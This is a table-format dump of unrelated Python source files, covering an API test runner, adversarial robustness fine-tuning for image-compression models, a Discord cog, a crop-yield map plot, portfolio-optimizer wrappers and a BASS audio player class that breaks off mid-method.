content stringlengths 5 1.05M |
|---|
# todo rename
# todo docstring
# todo validate incoming data
# todo support multiple tests with arrays
import sys
sys.path.append('../src')
import logging
from pathlib import Path
import json
import requests
from dataclasses import dataclass
from app import routes
from models import Item
from models import Rating
from models import Preference
from models import Event
from models import Survey
# Maps API route -> model class used to validate incoming payloads.
# NOTE(review): not referenced anywhere in the visible code — presumably
# intended for the "todo implement validation" below; confirm before removing.
validators = {
    '/items': Item,
    '/ratings': Rating,
    '/preferences': Preference,
    '/events': Event,
    '/survey': Survey
}
@dataclass
class HTTPTest:
    """
    Simple wrapper around `requests`: sends one request and returns the response.
    """
    route: str    # API route, e.g. '/ratings'
    method: str   # HTTP verb, e.g. 'GET' or 'POST'
    data: dict    # payload: query params for GET, JSON body otherwise

    def run(self, host):
        """Send self.data to host/route and return the `requests.Response`.

        GET requests send the payload as query parameters; any other method
        sends it as a JSON body.
        """
        # rstrip/lstrip (instead of strip on both ends) so a trailing slash on
        # the route is preserved and only the join point is normalized.
        url = f"{host.rstrip('/')}/{self.route.lstrip('/')}"
        payload_kwargs = {"params": self.data} if self.method == "GET" else {"json": self.data}
        return requests.request(method=self.method, url=url, **payload_kwargs)

    # todo get object from response
    # todo implement validation
@dataclass
class Loader:
    """
    Loads JSON test payloads for a given route and method.
    """
    # Class attributes (no annotations), so they are not dataclass fields.
    root = "./payloads"
    ext = "json"

    def load(self, route, method):
        """Read `<root>/<route name>/<method>.json` and return the parsed data."""
        payload_path = Path(self.root) / Path(route).name / f"{method.lower()}.{self.ext}"
        return json.loads(payload_path.read_text())
def run_tests():
    """Run an HTTP test for every route/method that has a payload file.

    Routes without a payload file on disk are skipped silently.
    """
    loader = Loader()
    host = "http://localhost:5000"
    for route, resource in routes.items():
        for method in resource.__dict__['methods']:
            try:
                data = loader.load(route, method)
            except FileNotFoundError:
                continue
            # todo fix later: only /ratings is exercised for now
            if route != '/ratings':
                continue
            print(HTTPTest(route, method, data).run(host).text)

run_tests()
|
import os
import sys
import time
import argparse
from glob import glob
import torch
import torch.nn as nn
from torch.utils.tensorboard import SummaryWriter
import numpy as np
import random
from PIL import Image
from thop import profile
import model
from utils import torch_msssim, ops
from anchors import balle
from torchvision import datasets, transforms
from datetime import datetime
import coder
import lpips
def load_data(train_data_dir, train_batch_size):
    """Build a shuffled DataLoader over an ImageFolder dataset.

    Workers are re-seeded deterministically and the shuffle generator uses a
    fixed seed, so batch order is reproducible across runs.
    """
    transform = transforms.Compose([
        # transforms.Resize(256),
        # transforms.RandomResizedCrop(size=112),
        transforms.ToTensor(),
    ])
    dataset = datasets.ImageFolder(train_data_dir, transform=transform)

    def seed_worker(worker_id):
        # Derive numpy/random seeds from the torch seed so per-worker
        # augmentation randomness is reproducible.
        worker_seed = torch.initial_seed() % 2**32
        np.random.seed(worker_seed)
        random.seed(worker_seed)

    shuffle_gen = torch.Generator()
    shuffle_gen.manual_seed(0)  # fixed seed -> same shuffle order every run
    return torch.utils.data.DataLoader(
        dataset,
        batch_size=train_batch_size,
        shuffle=True,
        num_workers=8,
        drop_last=True,
        pin_memory=True,
        worker_init_fn=seed_worker,
        generator=shuffle_gen,
    )
def add_noise(x):
    """Return x plus elementwise uniform noise drawn from [-0.5, 0.5)."""
    perturbation = torch.Tensor(np.random.uniform(-0.5, 0.5, x.size())).cuda()
    return x + perturbation
def train(args, checkpoint_dir, CONTEXT=True, POSTPROCESS=True, crop=None):
    """Adversarially finetune an image-compression model.

    Per batch, this alternates two phases:
      1. Attack: optimize an additive perturbation `noise` that maximizes
         reconstruction error of the analysis/synthesis pair while keeping the
         input MSE below `args.noise`.
      2. Finetune: update the codec weights on the perturbed (quantized)
         batch with the usual rate-distortion objective.

    Arguments:
        args: parsed CLI config (model, quality, metric, lr_train, lr_attack,
            steps, noise, lamb_attack, ckpt, download, ...).
        checkpoint_dir: checkpoint path, used only when args.model == "elic".
        CONTEXT, POSTPROCESS: flags forwarded to the model's forward pass.
        crop: unused here.
    """
    TRAINING = True
    dev_id = "cuda:0"
    C = 3
    ckpt_index = 0
    batch_size = 8
    # print('====> Encoding Image:', im_dir)
    ## model initalization
    MODEL = args.model
    quality = args.quality
    arch_lists = ["factorized", "hyper", "context", "cheng2020", "nlaic", "elic"]
    assert MODEL in arch_lists, f"'{MODEL}' not in {arch_lists} for param '-m'"
    if MODEL == "elic":
        image_comp = model.ImageCompression(256)
        image_comp.load_state_dict(torch.load(checkpoint_dir), strict=False)
        image_comp.to(dev_id).eval()
        print("[ ARCH ]:", MODEL)
    if MODEL in ["factorized", "hyper", "context", "cheng2020"]:
        image_comp = balle.Image_coder(MODEL, quality=quality, metric=args.metric, pretrained=args.download).to(dev_id)
        print("[ ARCH ]:", MODEL, quality, args.metric)
        if args.download == False:
            print("[ CKPTS ]:", args.ckpt)
            image_comp.load_state_dict(torch.load(args.ckpt))
            image_comp.to(dev_id).train()
        else:
            print("[ CKPTS ]: Download from CompressAI Model Zoo", )
    # image_comp = nn.DataParallel(image_comp, device_ids=[0])
    # loss_func is only needed (and only defined) for the ms-ssim metric;
    # the mse path below computes its distortion inline.
    if args.metric == "ms-ssim":
        loss_func = torch_msssim.MS_SSIM(max_val=1).to(dev_id)
    lamb = args.lamb_attack
    # lr_decay_iters = [70-ckpt_index,80-ckpt_index,90-ckpt_index,95-ckpt_index]
    lr_decay_iters = [600,1200,1800]
    decay_gamma = 0.33
    noise_thres = args.noise
    print("Lambda:", lamb)
    # N_ADV = number of untouched (original) samples at the front of each
    # batch; samples from index N_ADV on are perturbed. 0 => attack all 8.
    N_ADV=0
    print(f"num of ori/adv examples: {N_ADV}/{8-N_ADV}")
    if args.metric == "mse":
        # scale lambda to 8-bit pixel range, matching CompressAI conventions
        lamb = lamb * 255. * 255.
    #Augmentated Model
    print("Refine with Adversarial examples")
    model_dir = f"{args.model}-{args.quality}"
    ckpt_dir = f"./ckpts/attack/{model_dir}/iter/{args.metric}"
    # optimizer
    # Split params: entropy-bottleneck quantiles get their own aux optimizer.
    parameters = set(p for n, p in image_comp.named_parameters() if not n.endswith(".quantiles"))
    aux_parameters = set(p for n, p in image_comp.named_parameters() if n.endswith(".quantiles"))
    optimizer = torch.optim.Adam(parameters, lr=args.lr_train)
    aux_optimizer = torch.optim.Adam(aux_parameters, lr=1e-3)
    # optimizer = torch.optim.Adam(image_comp.parameters(),lr=args.lr_attack)
    lr_scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, lr_decay_iters, gamma=decay_gamma, last_epoch=-1)
    for epoch in range(1):
        bpp_epoch, loss_epoch = 0., 0.
        train_loader = load_data(f'/workspace/ct/datasets/datasets/div2k', batch_size)
        for step, (batch_x, targets) in enumerate(train_loader):
            # noise_thres = min(args.noise, 0.00001 + (args.noise-0.00001)*step/500)
            noise_thres = args.noise
            t = time.time()
            batch_x = batch_x.to('cuda')
            num_pixels = batch_x.size()[0]*batch_x.size()[2]*batch_x.size()[3]
            # generate batch_x_adv
            im_s = batch_x[N_ADV:,:,:,:]
            noise = torch.zeros(im_s.size())
            noise = noise.cuda().requires_grad_(True) # set requires_grad=True after moving tensor to device
            adv_optimizer = torch.optim.Adam([noise],lr=args.lr_attack)
            lr_adv_scheduler = torch.optim.lr_scheduler.MultiStepLR(adv_optimizer, [300,600,900], gamma=0.33, last_epoch=-1)
            noise_range = 0.5
            # Inner attack loop: optimize the perturbation only (codec frozen).
            for i in range(args.steps):
                noise_clipped = ops.Up_bound.apply(ops.Low_bound.apply(noise, -noise_range), noise_range)
                im_in = ops.Up_bound.apply(ops.Low_bound.apply(im_s+noise_clipped, 0.), 1.)
                y_main = image_comp.net.g_a(im_in)
                x_ = image_comp.net.g_s(y_main)
                output_ = ops.Up_bound.apply(ops.Low_bound.apply(x_, 0.), 1.)
                # loss_i: input distortion (how visible the perturbation is)
                # loss_o: negated output distortion (maximize reconstruction error)
                loss_i = torch.mean((im_s - im_in) * (im_s - im_in))
                # loss_o = 1. - torch.mean((im_in - output_) * (im_in - output_)) # MSE(x_, y_)
                loss_o = 1. - torch.mean((im_s - output_) * (im_s - output_)) # MSE(x_, y_)
                # if i==999:
                #     print(loss_i.item(), loss_o.item())
                # If the perturbation exceeds its budget, shrink it; otherwise
                # push the reconstruction error up.
                if loss_i >= noise_thres:
                    loss = loss_i
                else:
                    loss = loss_o
                adv_optimizer.zero_grad()
                loss.backward()
                adv_optimizer.step()
                lr_adv_scheduler.step()
            # Quantize the adversarial input to valid 8-bit pixel values and
            # detach so the finetuning step does not backprop into the attack.
            im_uint8 = torch.round(im_in * 255.0)/255.0
            batch_x_new = batch_x.detach()
            batch_x_new[N_ADV:] = torch.clamp(im_uint8, min=0., max=1.0).detach()
            output, y_main, y_hyper, p_main, p_hyper = image_comp(batch_x_new, TRAINING, CONTEXT, POSTPROCESS)
            # lpips_loss = torch.mean(loss_func(batch_x, output))
            if args.metric == "ms-ssim":
                dloss = 1. - loss_func(batch_x_new, output)
            if args.metric == "mse":
                dloss = torch.mean((batch_x_new - output)**2)
            # bits-per-pixel from the likelihoods of main and hyper latents
            train_bpp_hyper = torch.sum(torch.log(p_hyper)) / (-np.log(2.) * num_pixels)
            train_bpp_main = torch.sum(torch.log(p_main)) / (-np.log(2.) * num_pixels)
            bpp = train_bpp_main + train_bpp_hyper
            # loss = dloss + lamb * bpp
            ## about lambda: https://interdigitalinc.github.io/CompressAI/zoo.html
            # [q3 - mse: 0.0067 * 255^2]
            # [q3 - mssim: 8.73]
            loss = lamb * dloss + bpp
            optimizer.zero_grad()
            aux_optimizer.zero_grad()
            loss.backward()
            optimizer.step()
            aux_loss = image_comp.net.entropy_bottleneck.loss()
            aux_loss.backward()
            aux_optimizer.step()
            bpp_epoch += bpp.item()
            loss_epoch += loss.item()
            print('step:', step, 'loss:', loss.item(), "distortion:", dloss.item(), 'rate:', bpp.item(), 'time:', time.time()-t, "noise thres:", noise_thres)
            if step % 100 == 0:
                # torch.save(image_comp.module.state_dict(), os.path.join(ckpt_dir,'ae_%d_%d_%0.8f_%0.8f.pkl' % (epoch, step, loss_epoch/(step+1), bpp_epoch/(step+1))))
                torch.save(image_comp.state_dict(), os.path.join(ckpt_dir,'ae_%d_%d_%0.8f_%0.8f.pkl' % (epoch, step, loss_epoch/(step+1), bpp_epoch/(step+1))))
        lr_scheduler.step()
    # torch.save(image_comp.module.state_dict(), os.path.join(ckpt_dir,'ae_%d_%0.8f_%0.8f.pkl' % (epoch, loss_epoch/(step+1), bpp_epoch/(step+1))))
    torch.save(image_comp.state_dict(), os.path.join(ckpt_dir,'ae_%d_%0.8f_%0.8f.pkl' % (epoch, loss_epoch/(step+1), bpp_epoch/(step+1))))
if __name__ == "__main__":
    args = coder.config()
    checkpoint = None
    # NOTE(review): only the "nonlocal" model resolves a checkpoint path here,
    # and glob(...)[0] raises IndexError if no matching file exists — confirm
    # that is the intended fail-fast behavior.
    if args.model == "nonlocal":
        checkpoint = glob('./ckpts/%d_%s/ae_%d_*' %(int(args.lamb), args.job, args.ckpt_num))[0]
    print("[CONTEXT]:", args.context)
    print("==== Loading Checkpoint:", checkpoint, '====')
    train(args, checkpoint, CONTEXT=args.context, POSTPROCESS=args.post, crop=None)
    # print(checkpoint, "bpps:%0.4f, psnr:%0.4f" %(bpp, psnr))
from .statistics import Statistics
async def setup(bot):
    """Extension entry point: build, initialize, and attach the Statistics cog."""
    statistics_cog = Statistics(bot)
    await statistics_cog.initialize()
    # NOTE(review): on discord.py >= 2.0, add_cog is a coroutine and would need
    # to be awaited — confirm the library version this targets.
    bot.add_cog(statistics_cog)
|
# -*- coding: utf-8 -*-
"""
Created on Wed Nov 09 13:06:12 2016
@author: jrl276
"""
import geojson
from descartes import PolygonPatch
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap
import matplotlib.cm as cm
import matplotlib as mpl
import numpy as np
#Define GCAM regions
# Maps each country polygon name (CTRYNAME in the geojson) to its GCAM region id.
# Fixed: the key 'Papua N Guin' was broken across two physical lines in the
# original source, which is not valid Python.
region = {
    'Russian Fed':24,'Canada':8,'Usa':32,'Norway':17,'Finland':14,'Sweden':14,'Iceland':17,'Estonia':13,
    'Uk':14,'Latvia':13,'Denmark':14,'Kazakhstan':10,'Lithuania':13,'Ireland':14,'Germany':14,'Belarus':15,
    'Netherlands':14,'China':11,'Bel-lux':14,'Mongolia':10,'France':14,'Slovakia':13,'Poland':13,'Czech Rep':13,
    'Ukraine':15,'Austria':14,'Moldova Rep':15,'Hungary':13,'Romania':13,'Italy':14,'Switzerland':17,'Slovenia':13,
    'Croatia':16,'Bosnia Herzg':16,'Yugoslav Fr':16,'Japan':20,'Spain':14,'Georgia':10,'Andorra':14,'Bulgaria':13,
    'Kyrgyzstan':10,'Portugal':14,'Macedonia':16,'Turkey':16,'Azerbaijan':10,'Turkmenistan':10,'Uzbekistan':10,
    'North Korea':30,'Albania':16,'Greece':14,'Armenia':10,'Tajikistan':10,'Iran':22,'Afghanistan':28,'Syria':22,
    'Iraq':22,'Algeria':2,'Tunisia':2,'Pakistan':23,'South Korea':29,'Morocco':2,'Egypt':2,'Lybia':2,
    'Lebanon':22,'India':18,'Libya':2,'Israel':22,'Mexico':21,'Jordan':22,'Nepal':28,'Kuwait':22,
    'Saudi Arabia':22,'Myanmar':30,'Bhutan':28,'Western Sahara':2,'Bangladesh':28,'Mauritania':4,'Qatar':22,
    'Untd Arab Em':22,'Mali':4,'Cuba':9,'Laos':28,'Hong Kong':11,'Viet Nam':30,'Australia':6,'Niger':4,
    'Haiti':9,'Dominican Rp':9,'Chad':4,'Sudan':1,'Oman':22,'Thailand':30,'Philippines':30,'Belize':9,
    'Senegal':4,'Guatemala':9,'Honduras':9,'Burkina Faso':4,'Brazil':7,'New Zealand':6,'Eritrea':1,
    'El Salvador':9,'Panama':9,'Ethiopia':1,'Kenya':1,'Gambia':4,'Nigeria':4,'Liberia':4,'Cambodia':30,
    'Guineabissau':4,'Yemen':22,'Guinea':4,'Cameroon':4,'Nicaragua':9,'Colombia':12,'Venezuela':26,
    'Suriname':26,'Djibouti':1,'Somalia':1,'Costa Rica':9,'Aruba':9,'Trinidad Tob':9,'Ghana':4,'Togo':4,
    'Benin':4,'Cent Afr Rep':4,'Cote Divoire':4,'Sri Lanka':28,'Sierra Leone':4,'Zaire':4,'Brunei Darsm':30,
    'Guyana':26,'Uganda':1,'Fr Guiana':26,'Eq Guinea':4,'Indonesia':19,'Malaysia':30,'Singapore':30,
    'Ecuador':27,'Rwanda':1,'Tanzania':3,'Gabon':4,'Congo':4,'Burundi':1,'Peru':27,'Bolivia':27,
    'Chile':27,'Angola':3,'Papua N Guin':30,'Zambia':3,'Malawi':3,'Mozambique':3,'Namibia':3,
    'Madagascar':1,'Zimbabwe':3,'Lesotho':3,'Botswana':3,'Swaziland':3,'Paraguay':27,'Uruguay':27,
    'Argentina':5,'South Africa':25}
#Load in Data
# percent-change values; reshaped below to (32 regions, 18 AEZs) RGBA colors
l = np.loadtxt('../data/SSP1_Yield_Improve.txt')
#Define Colormap
norm = mpl.colors.Normalize(vmin=-115, vmax=190)
cmap = cm.RdYlGn
colors=cm.ScalarMappable(norm=norm, cmap=cmap)
colors.set_array(l)
a = colors.to_rgba(l)
a = np.reshape(a,[32,18,4])
#Load in geojson file
with open("../data/aez-w-greenland.geojson") as json_file:
    json_data = geojson.load(json_file)
#Create Figure
plt.clf()
fig = plt.figure(figsize=(10,5))
ax = fig.add_subplot(111)
#Set basemap
m = Basemap(projection='robin', lon_0=0,resolution='c')
m.drawmapboundary(fill_color='white', zorder=-1)
m.drawparallels(np.arange(-90.,91.,30.), labels=[1,0,0,1], dashes=[1,1], linewidth=0.25, color=[0.5,0.5,0.5,0.35],fontsize=14)
m.drawmeridians(np.arange(0., 360., 60.), labels=[1,0,0,1], dashes=[1,1], linewidth=0.25, color=[0.5,0.5,0.5,0.35],fontsize=14)
m.drawcoastlines(color='0.6', linewidth=1)
#Color GCAM AEZ regions
# NOTE(review): assumes features 0..2795 are country/AEZ polygons and the last
# three (2796..2798) are uncolored filler — confirm against the geojson file.
# For i >= 2796, `name`/`aez` keep their values from the last colored feature;
# color1 is computed from them and then overwritten with white below.
for i in range(2799):
    coordlist = json_data.features[i]['geometry']['coordinates'][0]
    if i < 2796:
        name = json_data.features[i]['properties']['CTRYNAME']
        aez = json_data.features[i]['properties']['AEZ']
    # project lon/lat into map coordinates in place
    for j in range(len(coordlist)):
        for k in range(len(coordlist[j])):
            coordlist[j][k][0],coordlist[j][k][1]=m(coordlist[j][k][0],coordlist[j][k][1])
    poly = {"type":"Polygon","coordinates":coordlist}#coordlist
    color1 = a[region[name]-1,int(aez)-1,:]
    EK = 'none'
    if i>=2796:
        color1=[1,1,1,1]
    ax.add_patch(PolygonPatch(poly, fc=color1, ec=EK, zorder=2 ))
#Annotate
ax.set_title('SSP1 Maize Yield Improvement',fontsize=25,y=1.01)#GDP Adjusted Policy Cost#Policy Cost#Policy Cost Reduction from Technology
plt.annotate(2100,xy=(0.15,0.2),xytext=(0.15,0.2),xycoords='axes fraction',fontsize=30)
cb = m.colorbar(colors,'right')
cb.ax.tick_params(labelsize=14)
cb.set_label('Percent Change from Reference',fontsize=16,rotation=270,labelpad=20)#cb.set_label('Trillion 1990 USD',fontsize=16,rotation=270,labelpad=20)
#Save Figure
ax.axis('scaled')
plt.draw()
plt.show()
fig.savefig('test.pdf',format='pdf')
class Manipulation():
    ''' Data Manipulation: filter song records and normalise quote characters. '''

    def __init__(self, data):
        self.data = data
        # NOTE(review): the original source had `self.badPattern = '''` — an
        # unterminated triple-quoted string that is a SyntaxError. Given
        # goodPattern is an apostrophe, the intent is presumably to replace a
        # stray double-quote character with an apostrophe — confirm.
        self.badPattern = '"'
        self.goodPattern = "'"
        self.filteredKey = ['artist_name', 'title']

    ### STATIC METHODS
    def findStringAndReplace(self, oldStr, pattern, newStr):
        """Return oldStr with every occurrence of pattern replaced by newStr."""
        return oldStr.replace(pattern, newStr)

    ### INSTANCE METHODS
    def filterDataByKeys(self):
        """Keep only the filteredKey fields of each record, cleaning their values."""
        newArr = []
        for d in self.data:
            filterData = { x: d[x] for x in d.keys() if x in self.filteredKey }
            for key in self.filteredKey:
                filterData[key] = self.findStringAndReplace(filterData[key], self.badPattern, self.goodPattern)
            newArr.append(filterData)
        return newArr
|
from .alarm_clock import alarm_clock |
from precise.skaters.managers.ppomanagerfactory import ppo_ewa_long_manager_factory, ppo_pm_long_manager_factory, ppo_long_manager_factory
from precise.skaters.covariance.bufsk import buf_sk_glcv_pcov_d0_n100, buf_sk_glcv_pcov_d0_n100_t0, buf_sk_lw_pcov_d0_n100, buf_sk_mcd_pcov_d0_n100, buf_sk_lw_pcov_d1_n100
# PyPortfolioOpt managers
# Naming convention (presumably): pm = partial-moments / ewa = exponentially
# weighted covariance, t0 = target 0, r025 = r=0.025, n50 = n_emp=50, and the
# suffix names the optimization objective — confirm against the factory docs.
def ppo_pm_t0_d0_r025_n50_vol_long_manager(y, s, k=1, e=1):
    # k != 1 is not supported by the underlying factory
    assert k == 1
    return ppo_pm_long_manager_factory(y=y, s=s, method='min_volatility', target=0, e=e, r=0.025, n_emp=50)

def ppo_ewa_d0_r025_n50_vol_long_manager(y, s, k=1, e=1):
    assert k == 1
    return ppo_ewa_long_manager_factory(y=y, s=s, method='min_volatility', e=e, r=0.025, n_emp=50)

def ppo_pm_t0_d0_r025_n50_quad_long_manager(y, s, k=1, e=1):
    assert k == 1
    return ppo_pm_long_manager_factory(y=y, s=s, method='max_quadratic_utility', target=0, e=e, r=0.025, n_emp=50)

def ppo_ewa_d0_r025_n50_quad_long_manager(y, s, k=1, e=1):
    assert k == 1
    return ppo_ewa_long_manager_factory(y=y, s=s, method='max_quadratic_utility', e=e, r=0.025, n_emp=50)

def ppo_pm_t0_d0_r025_n50_sharpe_long_manager(y, s, k=1, e=1):
    assert k == 1
    return ppo_pm_long_manager_factory(y=y, s=s, method='max_sharpe', target=0, e=e, r=0.025, n_emp=50)

def ppo_ewa_d0_r025_n50_sharpe_long_manager(y, s, k=1, e=1):
    assert k == 1
    return ppo_ewa_long_manager_factory(y=y, s=s, method='max_sharpe', e=e, r=0.025, n_emp=50)
# Sklearn with min vol
def ppo_sk_lw_pcov_d1_n100_vol_long_manager(y, s, k=1, e=1):
    # Fixed: the function name says d1 but the original passed the d0 skater;
    # buf_sk_lw_pcov_d1_n100 is imported above and was otherwise unused.
    return ppo_long_manager_factory(y=y, s=s, f=buf_sk_lw_pcov_d1_n100, e=e, method='min_volatility')

def ppo_sk_glcv_pcov_d0_n100_vol_long_manager(y, s, k=1, e=1):
    return ppo_long_manager_factory(y=y, s=s, f=buf_sk_glcv_pcov_d0_n100, e=e, method='min_volatility')

def ppo_sk_glcv_pcov_d0_n100_t0_vol_long_manager(y, s, k=1, e=1):
    return ppo_long_manager_factory(y=y, s=s, f=buf_sk_glcv_pcov_d0_n100_t0, e=e, method='min_volatility')

def ppo_sk_mcd_pcov_d0_n100_vol_long_manager(y, s, k=1, e=1):
    return ppo_long_manager_factory(y=y, s=s, f=buf_sk_mcd_pcov_d0_n100, e=e, method='min_volatility')
# Sklearn with quadratic util
def ppo_sk_lw_pcov_d0_n100_quad_long_manager(y, s, k=1, e=1):
    # Ledoit-Wolf shrinkage covariance, max quadratic utility objective
    return ppo_long_manager_factory(y=y,s=s,f=buf_sk_lw_pcov_d0_n100, e=e, method='max_quadratic_utility')

def ppo_sk_glcv_pcov_d0_n100_quad_long_manager(y, s, k=1, e=1):
    return ppo_long_manager_factory(y=y,s=s,f=buf_sk_glcv_pcov_d0_n100, e=e, method='max_quadratic_utility')

def ppo_sk_glcv_pcov_d0_n100_t0_quad_long_manager(y, s, k=1, e=1):
    return ppo_long_manager_factory(y=y,s=s,f=buf_sk_glcv_pcov_d0_n100_t0, e=e, method='max_quadratic_utility')

def ppo_sk_mcd_pcov_d0_n100_quad_long_manager(y, s, k=1, e=1):
    return ppo_long_manager_factory(y=y,s=s,f=buf_sk_mcd_pcov_d0_n100, e=e, method='max_quadratic_utility')
# Sklearn with max sharpe
# Fixed: all four sharpe variants accepted `e` but silently dropped it, unlike
# their vol/quad siblings; `e` is now forwarded to the factory.
def ppo_sk_lw_pcov_d0_n100_sharpe_long_manager(y, s, k=1, e=1):
    return ppo_long_manager_factory(y=y, s=s, f=buf_sk_lw_pcov_d0_n100, e=e, method='max_sharpe')

def ppo_sk_glcv_pcov_d0_n100_sharpe_long_manager(y, s, k=1, e=1):
    return ppo_long_manager_factory(y=y, s=s, f=buf_sk_glcv_pcov_d0_n100, e=e, method='max_sharpe')

def ppo_sk_glcv_pcov_d0_n100_t0_sharpe_long_manager(y, s, k=1, e=1):
    return ppo_long_manager_factory(y=y, s=s, f=buf_sk_glcv_pcov_d0_n100_t0, e=e, method='max_sharpe')

def ppo_sk_mcd_pcov_d0_n100_sharpe_long_manager(y, s, k=1, e=1):
    return ppo_long_manager_factory(y=y, s=s, f=buf_sk_mcd_pcov_d0_n100, e=e, method='max_sharpe')
# Registry of all PyPortfolioOpt-based long-only managers defined above.
# NOTE(review): the name keeps the original spelling "MANGERS" (sic) because
# external code may import it by that name.
# Fixed: ppo_ewa_d0_r025_n50_quad_long_manager appeared twice in the original.
PPO_LONG_MANGERS = [ppo_pm_t0_d0_r025_n50_vol_long_manager,
                    ppo_ewa_d0_r025_n50_vol_long_manager,
                    ppo_pm_t0_d0_r025_n50_quad_long_manager,
                    ppo_ewa_d0_r025_n50_quad_long_manager,
                    ppo_pm_t0_d0_r025_n50_sharpe_long_manager,
                    ppo_ewa_d0_r025_n50_sharpe_long_manager,
                    ppo_sk_lw_pcov_d1_n100_vol_long_manager,
                    ppo_sk_glcv_pcov_d0_n100_vol_long_manager,
                    ppo_sk_glcv_pcov_d0_n100_t0_vol_long_manager,
                    ppo_sk_mcd_pcov_d0_n100_vol_long_manager,
                    ppo_sk_lw_pcov_d0_n100_quad_long_manager,
                    ppo_sk_glcv_pcov_d0_n100_quad_long_manager,
                    ppo_sk_glcv_pcov_d0_n100_t0_quad_long_manager,
                    ppo_sk_mcd_pcov_d0_n100_quad_long_manager,
                    ppo_sk_lw_pcov_d0_n100_sharpe_long_manager,
                    ppo_sk_glcv_pcov_d0_n100_sharpe_long_manager,
                    ppo_sk_glcv_pcov_d0_n100_t0_sharpe_long_manager,
                    ppo_sk_mcd_pcov_d0_n100_sharpe_long_manager]
|
import sys
import time
from pathlib import Path
from loguru import logger
from magic import from_file
from scribepy.pybass.pybass import *
from scribepy.pybass.pybass_aac import (
BASS_AAC_StreamCreateFile,
BASS_MP4_StreamCreateFile,
)
from scribepy.pybass.pybassflac import BASS_FLAC_StreamCreateFile
from scribepy.pybass.pybass_tta import BASS_TTA_StreamCreateFile
from scribepy.pybass.pybass_alac import BASS_ALAC_StreamCreateFile
from scribepy.pybass.pybass_ac3 import BASS_AC3_StreamCreateFile
# Directory containing this module; the BASS_fx shared library lives beside it.
player_module = Path(__file__).parent
fx_module = ctypes.CDLL(f"{player_module}/BASS_modules/libbass_fx.so")
# NOTE(review): fx_func_type is defined but never used; BASS_FX_TempoCreate is
# built with `func_type`, which presumably comes from the star import of
# scribepy.pybass.pybass — confirm and remove one of the two.
fx_func_type = ctypes.CFUNCTYPE
BASS_ATTRIB_TEMPO = 0x10000
BASS_FX_FREESOURCE = 0x10000
# HSTREAM BASS_FX_TempoCreate(DWORD chan, DWORD flags)
BASS_FX_TempoCreate = func_type(HSTREAM, ctypes.c_ulong, ctypes.c_ulong)(
    ("BASS_FX_TempoCreate", fx_module)
)
def get_module_to_use(ext):
    """
    Get module to use according to the file's MIME type.
    Arguments:
        ext: MIME type of the file (as returned by magic.from_file).
    Returns:
        BASS module to use to create stream.
    Raises:
        KeyError: if the MIME type is not supported.
    """
    return {
        "audio/x-hx-aac-adts": BASS_AAC_StreamCreateFile,
        "audio/flac": BASS_FLAC_StreamCreateFile,
        "audio/x-m4a": BASS_ALAC_StreamCreateFile,
        "audio/x-wav": BASS_StreamCreateFile,
        "audio/ogg": BASS_StreamCreateFile,
        # Fixed: the original key was "audio/mpegapplication/octet-stream",
        # two MIME types fused together, which no real file ever reports;
        # MP3 files are detected as "audio/mpeg".
        "audio/mpeg": BASS_StreamCreateFile,
        "video/mp4": BASS_MP4_StreamCreateFile,
        "application/octet-stream": BASS_TTA_StreamCreateFile,
        "audio/vnd.dolby.dd-raw": BASS_AC3_StreamCreateFile,
    }[ext]
class Player:
    """
    A class to interact with pybass module.
    """

    def __init__(self):
        logger.debug("Try to initialize BASS")
        if not BASS_Init(-1, 44100, 0, 0, 0):
            logger.exception(
                f"BASS INITIALIZATION ERROR { get_error_description(BASS_ErrorGetCode()) }"
            )
            print(
                "BASS INITIALIZATION ERROR",
                get_error_description(BASS_ErrorGetCode()),
            )
            sys.exit(0)
        self.stream = None  # current BASS stream handle; None until a file is loaded
        self.tempo = 0      # cumulative tempo offset applied via BASS_ATTRIB_TEMPO

    def __del__(self):
        self.destruct()

    @property
    def handle(self):
        """
        Return a file stream if exists or create one if it doesn't already exist.
        Returns:
            BASS channel stream.
        """
        if self.stream is None:
            self.create_file_stream("")
        return self.stream

    @handle.deleter
    def handle(self):
        self.destruct()

    def create_file_stream(self, file):
        """
        Create sample stream from file and add Tempo effect to it.
        Arguments:
            file: File to create stream from.
                ( MP3, MP2, MP1, OGG, WAV, AIFF or plugin supported file).
        Returns:
            None if successful or error dictionary if unsuccessful.
        """
        # stream = BASS_StreamCreateFile(False, bytes(file), 0, 0, BASS_STREAM_DECODE)
        logger.debug("Try to create BASS stream from file")
        try:
            f = Path(file)
            file_mime = from_file(str(f), mime=True)
            module = get_module_to_use(file_mime)
            # Fixed: the original passed `BASS_STREAM_DECODE or BASS_UNICODE`,
            # a boolean `or` that always evaluates to BASS_STREAM_DECODE.
            # BASS_UNICODE would be wrong here anyway, since the filename is
            # passed as bytes rather than UTF-16, so only the decode flag is kept.
            stream = module(False, bytes(f), 0, 0, BASS_STREAM_DECODE)
            # stream = BASS_AAC_StreamCreateFile(False, bytes(file), 0, 0, 0)
            self.stream = BASS_FX_TempoCreate(stream, BASS_FX_FREESOURCE)
            logger.success(f"Created stream from {f}")
        except KeyError as error:
            logger.exception(error)
            self.destruct()
            return {"error": f"{Path(f).suffix} files are not supported"}
        except IsADirectoryError as error:
            logger.exception(error)
            return {"error": f"{Path(f)} is a directory"}

    def destruct(self):
        """
        Stop stream if playing or paused and free the sample stream's resources.
        Returns:
            None.
        """
        try:
            status = BASS_ChannelIsActive(self.handle)
            if status == BASS_ACTIVE_PLAYING or status == BASS_ACTIVE_PAUSED:
                self.stop()
            BASS_StreamFree(self.handle)
            self.stream = None
        except ctypes.ArgumentError as error:
            logger.exception(error)
            self.stream = None

    def play(self, restart=False):
        """
        Start (or resume) playback of a sample.
        Arguments:
            restart: Whether to restart playback from beginning.
        Returns:
            True if successful else False.
        """
        logger.debug("Play stream")
        try:
            # NOTE(review): uses self.stream directly (may be None) while most
            # other methods use self.handle, which lazily creates a stream —
            # confirm whether the asymmetry is intentional.
            return BASS_ChannelPlay(self.stream, restart)
        except Exception as error:
            logger.exception(error)
            return False

    def pause(self):
        """
        Pause the stream.
        Returns:
            True if successful else False.
        """
        logger.debug("Pause Stream")
        try:
            return BASS_ChannelPause(self.handle)
        except Exception as error:
            # Log errors
            logger.exception(error)
            return False

    def stop(self):
        """
        Stop the stream.
        Returns:
            True if successful else False.
        """
        logger.debug("Stop Stream")
        try:
            return BASS_ChannelStop(self.handle)
        except Exception as error:
            logger.exception(error)
            return False

    @property
    def length(self):
        """
        Get length of stream in Seconds.
        Returns:
            Length of stream.
        """
        _len = BASS_ChannelGetLength(self.handle, BASS_POS_BYTE)
